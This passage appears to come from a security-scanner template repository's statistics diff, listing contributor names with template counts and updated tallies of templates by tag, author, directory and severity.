crosser","count":31},{"name":"ice3man","count":29},{"name":"mastercho","count":29},{"name":"pwnhxl","count":28},{"name":"hardik-solanki","count":24},{"name":"organiccrap","count":24},{"name":"techbrunchfr","count":23},{"name":"ctflearner","count":23},{"name":"harsh","count":23},{"name":"ffffffff0x","count":22},{"name":"parthmalhotra","count":20},{"name":"sullo","count":18},{"name":"cckuailong","count":18},{"name":"random-robbie","count":16},{"name":"lu4nx","count":16},{"name":"0xpugazh","count":16},{"name":"shaikhyaser","count":16},{"name":"bhutch","count":15},{"name":"sheikhrishad","count":15},{"name":"unapibageek","count":15},{"name":"pr3r00t","count":15},{"name":"tenbird","count":14},{"name":"r3dg33k","count":14},{"name":"kazgangap","count":14},{"name":"milo2012","count":14},{"name":"dogasantos","count":14},{"name":"elsfa7110","count":13},{"name":"sharath","count":13},{"name":"nullfuzz","count":13},{"name":"0ri2n","count":13},{"name":"melbadry9","count":13},{"name":"theabhinavgaur","count":13},{"name":"suman_kar","count":12},{"name":"kazet","count":12},{"name":"meme-lord","count":12},{"name":"cyllective","count":11},{"name":"wdahlenb","count":11},{"name":"random_robbie","count":10},{"name":"alph4byt3","count":10},{"name":"logicalhunter","count":10},{"name":"hackergautam","count":10},{"name":"0x240x23elu","count":10},{"name":"co5mos","count":10},{"name":"nadino","count":10},{"name":"emadshanab","count":9},{"name":"adamcrosser","count":9},{"name":"olearycrew","count":9},{"name":"momika233","count":9},{"name":"fabaff","count":9},{"name":"oppsec","count":9},{"name":"initstring","count":9},{"name":"veshraj","count":8},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"irshad ahamed","count":8},{"name":"_0xf4n9x_","count":8},{"name":"noraj","count":8},{"name":"iamthefrogy","count":8},{"name":"zh","count":8},{"name":"divya_mudgal","count":7},{"name":"huta0","count":7},{"name":"its0x08","count":7},{"name":"harshbothra_","count":7},{"name":"kophjager007","count":7},{"name":"nodauf","count":7},{"name":"me_dheeraj (https://twitter.com/dheerajmadhukar)","count":7},{"name":"techryptic (@tech)","count":7},{"name":"leovalcante","count":7},{"name":"amit-jd","count":7},{"name":"tarunkoyalwar","count":7},{"name":"randomstr1ng","count":7},{"name":"caspergn","count":7},{"name":"dr_set","count":7},{"name":"byt3bl33d3r","count":6},{"name":"forgedhallpass","count":6},{"name":"hahwul","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"imnightmaree","count":6},{"name":"evan rubinstein","count":6},{"name":"puzzlepeaches","count":6},{"name":"ja1sh","count":6},{"name":"gitlab red team","count":6},{"name":"pathtaga","count":6},{"name":"pentest_swissky","count":6},{"name":"__fazal","count":6},{"name":"devang-solanki","count":6},{"name":"justaacat","count":6},{"name":"clem9669","count":6},{"name":"xelkomy","count":6},{"name":"megamansec","count":6},{"name":"your3cho","count":5},{"name":"prajiteshsingh","count":5},{"name":"s0obi","count":5},{"name":"r12w4n","count":5},{"name":"shine","count":5},{"name":"powerexploit","count":5},{"name":"kh4sh3i","count":5},{"name":"joanbono","count":5},{"name":"r3naissance","count":5},{"name":"robotshell","count":5},{"name":"vicrack","count":5},{"name":"arm!tage","count":5},{"name":"mr-xn","count":5},{"name":"gtrrnr","count":5},{"name":"defr0ggy","count":5},{"name":"panch0r3d","count":5},{"name":"andreluna","count":5},{"name":"lucky0x0d","count":5},{"name":"podalirius","count":5},{"name":"yanyun","count":5},{"name":"ganofins","count":5},{"name":"tanq16","count":4},{"name":"incogbyte","count":4},{"name":"m4lwhere","count":4},{"name":"scent2d","count":4},{"name":"cookiehanhoan","count":4},{"name":"nybble04","count":4},{"name":"dolev farhi","count":4},{"name":"pulsesecurity.co.nz","count":4},{"name":"ice3man543","count":4},{"name":"3th1c_yuk1","count":4},{"name":"dadevel","count":4},{"name":"0xr2r","count":4},{"name":"king-alexander","count":4},{"name":"jpg0mez","count":4},{"name":"xxcdd","count":4},{"name":"e_schultze_","count":4},{"name":"lum8rjack","count":4},{"name":"wisnupramoedya","count":4},{"name":"ggranjus","count":4},{"name":"h1ei1","count":4},{"name":"k0pak4","count":4},{"name":"heeress","count":4},{"name":"shankar acharya","count":4},{"name":"iamnooob","count":4},{"name":"imjust0","count":3},{"name":"ph33r","count":3},{"name":"andydoering","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"dudez","count":3},{"name":"skeltavik","count":3},{"name":"davidmckennirey","count":3},{"name":"johnjhacking","count":3},{"name":"coldfish","count":3},{"name":"vsh00t","count":3},{"name":"farish","count":3},{"name":"emenalf","count":3},{"name":"dr0pd34d","count":3},{"name":"shifacyclewala","count":3},{"name":"_generic_human_","count":3},{"name":"unstabl3","count":3},{"name":"z3bd","count":3},{"name":"jarijaas","count":3},{"name":"impramodsargar","count":3},{"name":"splint3r7","count":3},{"name":"j3ssie","count":3},{"name":"alifathi-h1","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"me9187","count":3},{"name":"sushantkamble","count":3},{"name":"matt galligan","count":3},{"name":"salts","count":3},{"name":"canberbamber","count":3},{"name":"ekrause","count":3},{"name":"swissky","count":3},{"name":"fxploit","count":3},{"name":"c4sper0","count":3},{"name":"mavericknerd","count":3},{"name":"0w4ys","count":3},{"name":"whoever","count":3},{"name":"flx","count":3},{"name":"cheesymoon","count":3},{"name":"randomrobbie","count":3},{"name":"lucasljm2001","count":3},{"name":"thomas_from_offensity","count":3},{"name":"atomiczsec","count":3},{"name":"fyoorer","count":3},{"name":"parth","count":3},{"name":"taielab","count":3},{"name":"huowuzhao","count":3},{"name":"true13","count":3},{"name":"bernardofsr","count":3},{"name":"ambassify","count":3},{"name":"aringo","count":3},{"name":"userdehghani","count":3},{"name":"e1a","count":3},{"name":"evergreencartoons","count":3},{"name":"vagnerd","count":3},{"name":"f1tz","count":3},{"name":"isacaya","count":3},{"name":"lark-lab","count":3},{"name":"arcc","count":3},{"name":"xianke","count":3},{"name":"badboycxcc","count":3},{"name":"binaryfigments","count":3},{"name":"ayadim","count":2},{"name":"paperpen","count":2},{"name":"bp0lr","count":2},{"name":"sbani","count":2},{"name":"c3l3si4n","count":2},{"name":"dogancanbakir","count":2},{"name":"bsysop","count":2},{"name":"nuk3s3c","count":2},{"name":"rafaelwdornelas","count":2},{"name":"streetofhackerr007","count":2},{"name":"d4vy","count":2},{"name":"0xsapra","count":2},{"name":"v0idc0de","count":2},{"name":"t3l3machus","count":2},{"name":"danielmofer","count":2},{"name":"kre80r","count":2},{"name":"florianmaak","count":2},{"name":"martincodes-de","count":2},{"name":"joeldeleep","count":2},{"name":"codexlynx","count":2},{"name":"mzack9999","count":2},{"name":"dheerajmadhukar","count":2},{"name":"convisoappsec","count":2},{"name":"bing0o","count":2},{"name":"amsda","count":2},{"name":"nvn1729","count":2},{"name":"herry","count":2},{"name":"luci","count":2},{"name":"z0ne","count":2},{"name":"christianpoeschl","count":2},{"name":"foulenzer","count":2},{"name":"0xelkomy","count":2},{"name":"shelled","count":2},{"name":"ajaysenr","count":2},{"name":"arliya","count":2},{"name":"supr4s","count":2},{"name":"koti2","count":2},{"name":"davidegirardi","count":2},{"name":"mohammedsaneem","count":2},{"name":"zy9ard3","count":2},{"name":"thardt-praetorian","count":2},{"name":"pxmme1337","count":2},{"name":"brenocss","count":2},{"name":"hackerarpan","count":2},{"name":"dbrwsky","count":2},{"name":"8arthur","count":2},{"name":"parzival","count":2},{"name":"pbuff07","count":2},{"name":"cckuakilong","count":2},{"name":"k11h-de","count":2},{"name":"socketz","count":2},{"name":"bmcel","count":2},{"name":"charles d.","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"korteke","count":2},{"name":"666asd","count":2},{"name":"brucelsone","count":2},{"name":"w4cky_","count":2},{"name":"clarkvoss","count":2},{"name":"0xrudra","count":2},{"name":"maximus decimus","count":2},{"name":"manas_harsh","count":2},{"name":"kishore-hariram","count":2},{"name":"kiblyn11","count":2},{"name":"randomdhiraj","count":2},{"name":"sinkettu","count":2},{"name":"sy3omda","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"n-thumann","count":2},{"name":"dahse89","count":2},{"name":"y4er","count":2},{"name":"g4l1t0","count":2},{"name":"danmcinerney","count":2},{"name":"moritz nentwig","count":2},{"name":"afaq","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"usdag","count":2},{"name":"myztique","count":2},{"name":"msegoviag","count":2},{"name":"notnotnotveg","count":2},{"name":"gevakun","count":2},{"name":"bananabr","count":2},{"name":"ree4pwn","count":2},{"name":"0xnirvana","count":2},{"name":"cocxanh","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"0xcrypto","count":2},{"name":"h0j3n","count":2},{"name":"raesene","count":2},{"name":"geekby","count":2},{"name":"mrharshvardhan","count":2},{"name":"redteambrasil","count":2},{"name":"ehsahil","count":2},{"name":"shankaracharya","count":2},{"name":"joshlarsen","count":2},{"name":"thezakman","count":2},{"name":"vavkamil","count":2},{"name":"michal mikolas (nanuqcz)","count":2},{"name":"6mile","count":2},{"name":"sascha brendel","count":2},{"name":"zomsop82","count":2},{"name":"thevillagehacker","count":2},{"name":"udit_thakkur","count":2},{"name":"lotusdll","count":2},{"name":"supras","count":2},{"name":"joshua rogers","count":2},{"name":"liwermor","count":2},{"name":"wa1tf0rme","count":2},{"name":"gal nagli","count":2},{"name":"thabisocn","count":2},{"name":"hetroublemakr","count":2},{"name":"paradessia","count":2},{"name":"nkxxkn","count":2},{"name":"0xsmiley","count":2},{"name":"uomogrande","count":2},{"name":"lstatro","count":2},{"name":"ep1csage","count":2},{"name":"github.com/its0x08","count":2},{"name":"x1m_martijn","count":2},{"name":"luqman","count":1},{"name":"arall","count":1},{"name":"miryangjung","count":1},{"name":"aaronchen0","count":1},{"name":"soyelmago","count":1},{"name":"pratik khalane","count":1},{"name":"0xh7ml","count":1},{"name":"millermedia","count":1},{"name":"pepitoh","count":1},{"name":"hczdmr","count":1},{"name":"ilovebinbash","count":1},{"name":"guax1","count":1},{"name":"nagli","count":1},{"name":"yaser_s","count":1},{"name":"hotpot","count":1},{"name":"wabafet","count":1},{"name":"sshell","count":1},{"name":"h4kux","count":1},{"name":"retr02332","count":1},{"name":"ling","count":1},{"name":"high","count":1},{"name":"nytr0gen","count":1},{"name":"godfatherorwa","count":1},{"name":"toufik-airane","count":1},{"name":"jeya.seelan","count":1},{"name":"akshansh","count":1},{"name":"zinminphy0","count":1},{"name":"shivanshkhari","count":1},{"name":"revblock","count":1},{"name":"co0nan","count":1},{"name":"adnanekhan","count":1},{"name":"petruknisme","count":1},{"name":"vulnspace","count":1},{"name":"luqmaan hadia","count":1},{"name":"fpatrik","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"daviey","count":1},{"name":"kiransau","count":1},{"name":"failopen","count":1},{"name":"chron0x","count":1},{"name":"davidfegyver","count":1},{"name":"shiar","count":1},{"name":"manuelbua","count":1},{"name":"bjxsec","count":1},{"name":"prettyboyaaditya","count":1},{"name":"arjunchandarana","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"sherlocksecurity","count":1},{"name":"jfbes","count":1},{"name":"mhdsamx","count":1},{"name":"0xtavian","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"sickwell","count":1},{"name":"tirtha","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"ipanda","count":1},{"name":"narluin","count":1},{"name":"hardik-rathod","count":1},{"name":"arr0way","count":1},{"name":"yashgoti","count":1},{"name":"hazana","count":1},{"name":"fopina","count":1},{"name":"tehtbl","count":1},{"name":"x6263","count":1},{"name":"juicypotato1","count":1},{"name":"therealtoastycat","count":1},{"name":"kurohost","count":1},{"name":"ransomsec","count":1},{"name":"dorkerdevil","count":1},{"name":"unp4ck","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"elder tao","count":1},{"name":"youngpope","count":1},{"name":"viniciuspereiras","count":1},{"name":"flag007","count":1},{"name":"majidmc2","count":1},{"name":"rumble773","count":1},{"name":"adrianmf","count":1},{"name":"lady_bug","count":1},{"name":"aayush vishnoi","count":1},{"name":"andirrahmani1","count":1},{"name":"elitebaz","count":1},{"name":"whynotke","count":1},{"name":"pjborah","count":1},{"name":"erethon","count":1},{"name":"freakyclown","count":1},{"name":"sttlr","count":1},{"name":"nobody","count":1},{"name":"af001","count":1},{"name":"mrcl0wnlab","count":1},{"name":"xcapri","count":1},{"name":"screamy","count":1},{"name":"jonathanwalker","count":1},{"name":"egemenkochisarli","count":1},{"name":"ruppde","count":1},{"name":"0xparth","count":1},{"name":"puben","count":1},{"name":"y0no","count":1},{"name":"geraldino2","count":1},{"name":"exid","count":1},{"name":"josecosta","count":1},{"name":"2rs3c","count":1},{"name":"yavolo","count":1},{"name":"ptonewreckin","count":1},{"name":"mantissts","count":1},{"name":"zandros0","count":1},{"name":"ldionmarcil","count":1},{"name":"liquidsec","count":1},{"name":"null_hypothesis","count":1},{"name":"alevsk","count":1},{"name":"compr00t","count":1},{"name":"phillipo","count":1},{"name":"miroslavsotak","count":1},{"name":"exploitation","count":1},{"name":"makyotox","count":1},{"name":"mariam tariq","count":1},{"name":"micha3lb3n","count":1},{"name":"chesterblue","count":1},{"name":"calumjelrick","count":1},{"name":"jcockhren","count":1},{"name":"pphuahua","count":1},{"name":"mubassirpatel","count":1},{"name":"invisiblethreat","count":1},{"name":"jbaines-r7","count":1},{"name":"duty_1g","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"barthy.koeln","count":1},{"name":"jiheon-dev","count":1},{"name":"wlayzz","count":1},{"name":"w0tx","count":1},{"name":"remonsec","count":1},{"name":"ok_bye_now","count":1},{"name":"piyushchhiroliya","count":1},{"name":"aaban solutions","count":1},{"name":"kiks7","count":1},{"name":"mbmy","count":1},{"name":"charanrayudu","count":1},{"name":"kresec","count":1},{"name":"aresx","count":1},{"name":"udyz","count":1},{"name":"secthebit","count":1},{"name":"mayank_pandey01","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"aron molnar","count":1},{"name":"ph33rr","count":1},{"name":"dk999","count":1},{"name":"b4uh0lz","count":1},{"name":"f1she3","count":1},{"name":"spac3wh1te","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"mabdullah22","count":1},{"name":"opencirt","count":1},{"name":"gboddin","count":1},{"name":"shivampand3y","count":1},{"name":"becivells","count":1},{"name":"_darrenmartyn","count":1},{"name":"imhunterand","count":1},{"name":"dabla","count":1},{"name":"pdp","count":1},{"name":"nielsing","count":1},{"name":"ayadi","count":1},{"name":"xshuden","count":1},{"name":"allenwest24","count":1},{"name":"hakimkt","count":1},{"name":"0xprial","count":1},{"name":"ofjaaah","count":1},{"name":"gonski","count":1},{"name":"kr1shna4garwal","count":1},{"name":"eremit4","count":1},{"name":"houdinis","count":1},{"name":"b0rn2r00t","count":1},{"name":"udinchan","count":1},{"name":"sanineng","count":1},{"name":"francescocarlucci","count":1},{"name":"bugvsme","count":1},{"name":"tea","count":1},{"name":"cravaterouge","count":1},{"name":"whotwagner","count":1},{"name":"archer","count":1},{"name":"kchason","count":1},{"name":"queencitycyber","count":1},{"name":"viondexd","count":1},{"name":"shifacyclewla","count":1},{"name":"berkdusunur","count":1},{"name":"d4ly","count":1},{"name":"open-sec","count":1},{"name":"joaonevess","count":1},{"name":"tangxiaofeng7","count":1},{"name":"thelicato","count":1},{"name":"evolutionsec","count":1},{"name":"jc175","count":1},{"name":"am0nt31r0","count":1},{"name":"apt-mirror","count":1},{"name":"j33n1k4","count":1},{"name":"sec_hawk","count":1},{"name":"danigoland","count":1},{"name":"shiva (strobes security)","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"galoget","count":1},{"name":"wpsec","count":1},{"name":"r3s ost","count":1},{"name":"kaizensecurity","count":1},{"name":"carrot2","count":1},{"name":"esonhugh","count":1},{"name":"ramkrishna sawant","count":1},{"name":"elouhi","count":1},{"name":"kagamigawa","count":1},{"name":"kailashbohara","count":1},{"name":"iphantasmic","count":1},{"name":"booboohq","count":1},{"name":"rivalsec","count":1},{"name":"exceed","count":1},{"name":"ohlinge","count":1},{"name":"djoevanka","count":1},{"name":"nerrorsec","count":1},{"name":"mordavid","count":1},{"name":"juliosmelo","count":1},{"name":"_c0wb0y_","count":1},{"name":"lbb","count":1},{"name":"topscoder","count":1},{"name":"dali","count":1},{"name":"patralos","count":1},{"name":"regala_","count":1},{"name":"noah @thesubtlety","count":1},{"name":"babybash","count":1},{"name":"fmunozs","count":1},{"name":"chetgan","count":1},{"name":"yiran","count":1},{"name":"paper-pen","count":1},{"name":"th3.d1p4k","count":1},{"name":"qianbenhyu","count":1},{"name":"michael wedl","count":1},{"name":"jacalynli","count":1},{"name":"oscarintherocks","count":1},{"name":"zsusac","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"mah3sec_","count":1},{"name":"borna nematzadeh","count":1},{"name":"sospiro","count":1},{"name":"d0rkerdevil","count":1},{"name":"olewagner","count":1},{"name":"couskito","count":1},{"name":"mayankpandey01","count":1},{"name":"aravind","count":1},{"name":"httpvoid","count":1},{"name":"anon-artist","count":1},{"name":"byobin","count":1},{"name":"jna1","count":1},{"name":"amirmsafari","count":1},{"name":"deena","count":1},{"name":"danfaizer","count":1},{"name":"ahmed abou-ela","count":1},{"name":"west-wise","count":1},{"name":"un-fmunozs","count":1},{"name":"mr.bobo hp","count":1},{"name":"daffianfo","count":1},{"name":"banana69","count":1},{"name":"_harleo","count":1},{"name":"evan rubinstien","count":1},{"name":"naglis","count":1},{"name":"k3rwin","count":1},{"name":"luskabol","count":1},{"name":"zn9988","count":1},{"name":"sicksec","count":1},{"name":"amanrawat","count":1},{"name":"affix","count":1},{"name":"hlop","count":1},{"name":"patrick pirker","count":1},{"name":"undefl0w","count":1},{"name":"pry0cc","count":1},{"name":"adilsoybali","count":1},{"name":"alex","count":1},{"name":"lark lab","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"izn0u","count":1},{"name":"win3zz","count":1},{"name":"lixts","count":1},{"name":"sak1","count":1},{"name":"ky9oss","count":1},{"name":"ramondunker","count":1},{"name":"erikowen","count":1},{"name":"luciannitescu","count":1},{"name":"husain","count":1},{"name":"sinsinology","count":1},{"name":"hanlaomo","count":1},{"name":"dmartyn","count":1},{"name":"pascalheidmann","count":1},{"name":"carson chan","count":1},{"name":"yuansec","count":1},{"name":"marcio mendes","count":1},{"name":"f0xy","count":1},{"name":"amnotacat","count":1},{"name":"cbadke","count":1},{"name":"jrolf","count":1},{"name":"8authur","count":1},{"name":"momen eldawakhly","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"zhenwarx","count":1},{"name":"0xceba","count":1},{"name":"numan türle","count":1},{"name":"fur1na","count":1},{"name":"jteles","count":1},{"name":"qlkwej","count":1},{"name":"yusakie","count":1},{"name":"ringo","count":1},{"name":"caon","count":1},{"name":"ap3r","count":1},{"name":"mukundbhuva","count":1},{"name":"0xcharan","count":1},{"name":"rschio","count":1},{"name":"intx0x80","count":1},{"name":"harshinsecurity","count":1},{"name":"floriandewald","count":1},{"name":"alexrydzak","count":1},{"name":"bughuntersurya","count":1},{"name":"bad5ect0r","count":1},{"name":"ynnirc","count":1},{"name":"jaskaran","count":1},{"name":"adamparsons","count":1},{"name":"0xceeb","count":1},{"name":"elmahdi","count":1},{"name":"manasmbellani","count":1},{"name":"pussycat0","count":1},{"name":"ola456","count":1},{"name":"christbowel","count":1},{"name":"myst7ic","count":1},{"name":"mihhailsokolov","count":1},{"name":"notwhy","count":1},{"name":"ledoubletake","count":1},{"name":"justmumu","count":1},{"name":"ooooooo_q","count":1},{"name":"zeyad azima","count":1},{"name":"mass0ma","count":1},{"name":"omarjezi","count":1},{"name":"philippdelteil","count":1},{"name":"furkansayim","count":1},{"name":"rodnt","count":1},{"name":"matt miller","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"s1r1us","count":1},{"name":"lamscun","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"vinit989","count":1},{"name":"bjhulst","count":1},{"name":"rotemreiss","count":1},{"name":"0ut0fb4nd","count":1},{"name":"realexp3rt","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"thebinitghimire","count":1},{"name":"official_blackhat13","count":1},{"name":"lingtren","count":1},{"name":"xeldax","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"brianlam38","count":1},{"name":"watchtowr","count":1},{"name":"axrk","count":1},{"name":"igibanez","count":1},{"name":"noobexploiter","count":1},{"name":"iampritam","count":1},{"name":"aringo-bf","count":1},{"name":"0xd0ff9","count":1},{"name":"natto97","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"shockwave","count":1},{"name":"mchklt","count":1},{"name":"none","count":1},{"name":"shreyapohekar","count":1},{"name":"akash.c","count":1},{"name":"0xrod","count":1},{"name":"sdcampbell","count":1},{"name":"0xteles","count":1},{"name":"skylark-lab","count":1},{"name":"sorrowx3","count":1},{"name":"domenicoveneziano","count":1},{"name":"kabirsuda","count":1},{"name":"p-l-","count":1},{"name":"bywalks","count":1},{"name":"drfabiocastro","count":1},{"name":"b0yd","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"push4d","count":1},{"name":"marcos_iaf","count":1},{"name":"rubina119","count":1},{"name":"abbas.heybati","count":1},{"name":"act1on3","count":1},{"name":"petergrifin","count":1},{"name":"retr0","count":1},{"name":"notsoevilweasel","count":1},{"name":"th3r4id","count":1},{"name":"carlosvieira","count":1},{"name":"technicaljunkie","count":1},{"name":"andysvints","count":1},{"name":"denandz","count":1},{"name":"schniggie","count":1},{"name":"ahmetpergamum","count":1},{"name":"mammad_rahimzada","count":1},{"name":"dawid-czarnecki","count":1},{"name":"jeya seelan","count":1},{"name":"unblvr1","count":1},{"name":"nuts7","count":1},{"name":"rinolock","count":1},{"name":"harryha","count":1},{"name":"dievus","count":1},{"name":"orpheus","count":1},{"name":"hateshape","count":1},{"name":"amir-h-fallahi","count":1},{"name":"omarkurt","count":1},{"name":"bartu utku sarp","count":1},{"name":"jbertman","count":1},{"name":"pudsec","count":1},{"name":"breno_css","count":1},{"name":"colbyjack1134","count":1},{"name":"irshadahamed","count":1},{"name":"absshax","count":1},{"name":"m0ck3d","count":1},{"name":"vikas kundu","count":1},{"name":"lethargynavigator","count":1},{"name":"jub0bs","count":1},{"name":"hakluke","count":1},{"name":"knassar702","count":1},{"name":"ndmalc","count":1},{"name":"noamrathaus","count":1},{"name":"mlec","count":1},{"name":"miguelsegoviagil","count":1},{"name":"w8ay","count":1},{"name":"xc1ym","count":1},{"name":"rojanrijal","count":1},{"name":"mesaglio","count":1},{"name":"kareemse1im","count":1},{"name":"tim_koopmans","count":1},{"name":"furkansenan","count":1},{"name":"unknown","count":1},{"name":"droberson","count":1},{"name":"alperenkesk","count":1},{"name":"fq_hsu","count":1},{"name":"samuelsamuelsamuel","count":1},{"name":"xstp","count":1},{"name":"savik","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"thirukrishnan","count":1},{"name":"5up3r541y4n","count":1},{"name":"yashanand155","count":1},{"name":"stupidfish","count":1},{"name":"tirtha_mandal","count":1},{"name":"r3nz0","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"smaranchand","count":1},{"name":"lrtk-coder","count":1},{"name":"0xkayala","count":1},{"name":"vzamanillo","count":1},{"name":"brabbit10","count":1},{"name":"gpiechnik2","count":1},{"name":"michal-mikolas","count":1},{"name":"hexcat","count":1},{"name":"hyunsoo-ds","count":1},{"name":"metascan","count":1},{"name":"ahmed sherif","count":1},{"name":"osamahamad","count":1},{"name":"infosecsanyam","count":1},{"name":"palanichamy_perumal","count":1},{"name":"dwbzn","count":1},{"name":"shelld3v","count":1},{"name":"1nf1n7y","count":1},{"name":"clment cruchet","count":1},{"name":"blckraven","count":1},{"name":"akokonunes","count":1},{"name":"jas37","count":1},{"name":"phyr3wall","count":1},{"name":"willd96","count":1},{"name":"arqsz","count":1},{"name":"dale clarke","count":1},{"name":"unkl4b","count":1},{"name":"h4sh5","count":1},{"name":"professorabhay","count":1},{"name":"pwnwithlove","count":1},{"name":"0h1in9e","count":1},{"name":"higor melgaço","count":1},{"name":"jaimin gondaliya","count":1},{"name":"s1r1u5_","count":1},{"name":"rotembar","count":1}],"directory":[{"name":"http","count":7417},{"name":"file","count":337},{"name":"workflows","count":191},{"name":"network","count":138},{"name":"cloud","count":98},{"name":"code","count":81},{"name":"javascript","count":56},{"name":"ssl","count":29},{"name":"dns","count":22},{"name":"dast","count":21},{"name":"headless","count":11},{"name":"contributors.json","count":1},{"name":"TEMPLATES-STATS.json","count":1},{"name":"cves.json","count":1}],"severity":[{"name":"info","count":3657},{"name":"high","count":1703},{"name":"medium","count":1517},{"name":"critical","count":1029},{"name":"low","count":265},{"name":"unknown","count":39}],"types":[{"name":"file","count":337},{"name":"dns","count":25}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 2d64f7060a..6ddbad3911 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,5348 +1,5384 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-------------------------------------------------------|-------|---------------------------------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 2435 | dhiyaneshdk | 1262 | http | 7355 | info | 3645 | file | 337 | -| panel | 1123 | daffainfo | 864 | file | 337 | high | 1686 | dns | 25 | -| wordpress | 962 | dwisiswant0 | 803 | workflows | 191 | medium | 1503 | | | -| exposure | 901 | pikpikcu | 353 | network | 136 | critical | 1009 | | | -| xss | 895 | pussycat0x | 349 | cloud | 98 | low | 265 | | | -| wp-plugin | 837 | ritikchaddha | 326 | code | 81 | unknown | 38 | | | +| cve | 2474 | dhiyaneshdk | 1277 | http | 7417 | info | 3657 | file | 337 | +| panel | 1133 | daffainfo | 864 | file | 337 | high | 1703 | dns | 25 | +| wordpress | 973 | dwisiswant0 | 803 | workflows | 191 | medium | 1517 | | | +| exposure | 908 | pikpikcu | 353 | network | 138 | critical | 1029 | | | +| xss | 904 | pussycat0x | 353 | cloud | 98 | low | 265 | | | +| wp-plugin | 844 | ritikchaddha | 336 | code | 81 | unknown | 39 | | | | osint | 804 | pdteam | 297 | javascript | 56 | | | | | -| tech | 674 | princechaddha | 260 | ssl | 29 | | | | | -| lfi | 647 | ricardomaia | 232 | dns | 22 | | | | | -| misconfig | 602 | geeknik | 230 | dast | 21 | | | | | +| tech | 674 | princechaddha | 268 | ssl | 29 | | | | | +| lfi | 654 | ricardomaia | 232 | dns | 22 | | | | | +| misconfig | 606 | geeknik | 230 | dast | 21 | | | | | | edb | 599 | theamanrawat | 223 | headless | 11 | | | | | -| rce | 586 | r3y3r53 | 200 | contributors.json | 1 | | | | | -| packetstorm | 528 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | | -| cve2021 | 491 | gy741 | 158 | cves.json | 1 | | | | | -| wpscan | 487 | rxerium | 139 | | | | | | | +| rce | 591 | r3y3r53 | 200 | contributors.json | 1 | | | | | +| packetstorm | 530 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | | +| wpscan | 495 | gy741 | 158 | cves.json | 1 | | | | | +| cve2021 | 491 | rxerium | 141 | | | | | | | | cve2022 | 476 | sleepingbag945 | 132 | | | | | | | -| wp | 411 | righettod | 126 | | | | | | | -| unauth | 361 | arafatansari | 119 | | | | | | | -| cve2023 | 347 | tess | 109 | | | | | | | -| file | 346 | pdresearch | 76 | | | | | | | -| sqli | 344 | madrobot | 65 | | | | | | | -| authenticated | 341 | idealphase | 64 | | | | | | | -| intrusive | 297 | zzeitlin | 64 | | | | | | | -| kev | 271 | iamnoooob | 63 | | | | | | | -| cve2020 | 257 | akincibor | 59 | | | | | | | -| login | 250 | rootxharsh | 56 | | | | | | | -| detect | 249 | for3stco1d | 55 | | | | | | | -| token-spray | 243 | philippedelteil | 52 | | | | | | | +| wp | 419 | righettod | 131 | | | | | | | +| cve2023 | 364 | arafatansari | 118 | | | | | | | +| unauth | 363 | tess | 109 | | | | | | | +| sqli | 352 | pdresearch | 81 | | | | | | | +| file | 346 | iamnoooob | 68 | | | | | | | +| authenticated | 342 | madrobot | 65 | | | | | | | +| intrusive | 299 | idealphase | 65 | | | | | | | +| kev | 268 | zzeitlin | 64 | | | | | | | +| login | 259 | rootxharsh | 61 | | | | | | | +| detect | 259 | akincibor | 59 | | | | | | | +| cve2020 | 257 | for3stco1d | 55 | | | | | | | +| token-spray | 243 | philippedelteil | 53 | | | | | | | +| oast | 221 | edoardottt | 42 | | | | | | | | config | 220 | gaurang | 42 | | | | | | | -| oast | 219 | edoardottt | 41 | | | | | | | | top-200 | 215 | johnk3r | 40 | | | | | | | +| default-login | 211 | j4vaovo | 35 | | | | | | | | osint-social | 210 | c-sh0 | 35 | | | | | | | -| default-login | 209 | j4vaovo | 35 | | | | | | | -| token | 193 | adam crosser | 31 | | | | | | | -| network | 191 | luisfelipe146 | 31 | | | | | | | -| | 191 | ice3man | 28 | | | | | | | -| apache | 188 | pwnhxl | 28 | | | | | | | -| devops | 176 | hardik-solanki | 24 | | | | | | | -| cve2018 | 169 | organiccrap | 24 | | | | | | | -| iot | 166 | techbrunchfr | 23 | | | | | | | -| cve2019 | 164 | ctflearner | 23 | | | | | | | -| keys | 155 | harsh | 23 | | | | | | | -| joomla | 148 | ffffffff0x | 22 | | | | | | | -| malware | 142 | mastercho | 22 | | | | | | | -| redirect | 134 | parthmalhotra | 20 | | | | | | | -| aws | 133 | cckuailong | 18 | | | | | | | -| cloud | 132 | sullo | 18 | | | | | | | -| auth-bypass | 127 | 0xpugazh | 16 | | | | | | | -| ssrf | 118 | shaikhyaser | 16 | | 